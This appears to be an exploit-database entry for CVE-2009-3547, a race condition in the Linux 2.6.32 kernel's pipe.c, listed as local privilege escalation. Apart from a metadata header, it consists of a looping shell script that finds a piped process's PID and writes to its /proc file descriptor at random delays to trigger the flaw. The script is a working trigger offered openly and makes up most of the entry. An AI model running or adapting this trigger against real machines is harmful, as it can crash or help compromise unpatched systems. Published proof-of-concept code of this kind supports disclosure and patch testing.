Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)

Author: Earl Chew
type: local
platform: linux
port: 
date_added: 2009-11-11 
date_updated:  
verified: 1 
codes: CVE-2009-3547;OSVDB-59654 
tags: 
aliases:  
screenshot_url:  
application_url: 

while : ; do
   { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
   PID=$!
   OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
        { read PID REST ; echo $PID; } )
   OUT="${OUT%% *}"
   DELAY=$((RANDOM * 1000 / 32768))
   usleep $((DELAY * 1000 + RANDOM % 1000 ))
   echo n > /proc/$OUT/fd/1                 # Trigger defect
done